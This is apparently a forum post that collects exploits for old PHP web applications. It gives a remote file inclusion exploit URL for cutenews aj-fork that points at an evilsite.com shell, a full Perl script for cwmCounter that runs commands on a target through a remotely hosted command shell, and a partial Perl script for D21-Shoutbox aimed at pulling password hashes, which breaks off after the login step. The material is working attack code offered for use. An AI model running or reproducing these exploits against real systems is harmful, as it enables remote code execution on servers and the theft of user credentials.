DeltasecurityTEAM www.Deltasecurity.ir =========================================================== ================================================ * Portal Name : cutenews aj-fork * Class = Remote File Inclusion ; * Download =http://mesh.dl.sourceforge.net/sourceforge/ajfork/cn_aj_167.zip * Found by = DeltahackingTEAM * User In Delta Team (Tanha ) - Vulnerable Code include($cutepath.'/inc/plugins.php'); ++++++++++++++++++++++++++++++++++++++++++++ - Exploit: http://[target]/[Path]/inc/shows.inc.php?cutepath=http://evilsite.com/shell? Black_hat_cr(HCE) cwmCounter 5.1.1 (statistic.php) Remote File Include Exploit Code: #!/usr/bin/perl # #cwmCounter Remote File Include Exploit # #Coded by bd0rk || SOH-Crew # #Usage: cwmCounter.pl [target] [cmd shell] [shell variable] # #Greetings: str0ke, TheJT, Kacper, rgod # # use LWP::UserAgent; $Path = $ARGV[0]; $Pathtocmd = $ARGV[1]; $cmdv = $ARGV[2]; if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} head(); while() { print "[shell] \$"; while(<STDIN>) { $cmd=$_; chomp($cmd); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET =>$Path.'statistic.php?path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; $res = $xpl->request($req); $return = $res->content; $return =~ tr/[\n]/[ ]/; if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/) {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"} if($return =~ /(.*)/) { $finreturn = $1; $finreturn=~ tr/[ ]/[\n]/; print "\r\n$finreturn\n\r"; last; } else {print "[shell] \$";}}}last; sub head() { print "\n========================================================= ===================\r\n"; print " *cwmCounter Remote File Include Exploit*\r\n"; print "========================================================== ==================\r\n"; } sub usage() { head(); print " Usage: cmwCounter.pl [target] [cmd shell location] [cmd shell variable]\r\n\n"; print " <Site> - Full path to cwmCounter ex: http://www.site.com/ \r\n"; print " <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n"; print " <cmd variable> - Command variable used in php shell \r\n"; print "========================================================== ==================\r\n"; print " Bug Found by bd0rk \r\n"; print " www.soh-crew.it.tt \r\n"; print "========================================================== ==================\r\n"; exit(); } # milw0rm.com [2006-12-19] black_hat_cr(HCE) D21-Shoutbox version 1.1 exploit Code: ################################################ #!/usr/bin/perl # # D21-Shoutbox # # Author : longnhi # # Exploit Coded by Windak & langtuhaohoa # # We are : Www.HceGroup.Net - Www.HceGroup.Biz # ################################################ use HTTP::Cookies; use LWP 5.64; use HTTP::Request; # variables my $login_page = '?act=Login&CODE=01'; my $id = ''; my $table_fix = ''; my $pose_pm_page = '?'; my $tries = 5; my $sql = ''; my $i; my $j; # objects my $ua = LWP::UserAgent->new; my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0); my $resp; # init the cookie jar $ua->cookie_jar ($cj); # allow redirects on post requests push @{ $ua->requests_redirectable }, "POST"; # get user input print ' Forum Use D21-Shoutbox URL ? '; chomp (my $base_url = <STDIN>); print 'Your username ? '; chomp (my $user = <STDIN>); $form{entered_name} = $user; print 'Your pass ? '; # systems without stty will error otherwise my $stty = -x '/bin/stty'; system 'stty -echo' if $stty; # to turn off echoing chomp (my $pass = <STDIN>); system 'stty echo' if $stty; # to turn it back on print "\n" if $stty; print 'id you want get hashpass? '; # it'll say next to one of their posts chomp (my $id = <STDIN>); print ' Table prefix ( ex : ibf_ ) ? '; chomp ( my $table_fix = <STDIN>); # parse the given base url if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url } if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' } do { $resp = $ua->post ($base_url . $login_page, [ UserName => $user, PassWord => $pass, CookieDate => 1, ]); } while ($tries && !$resp->is_success());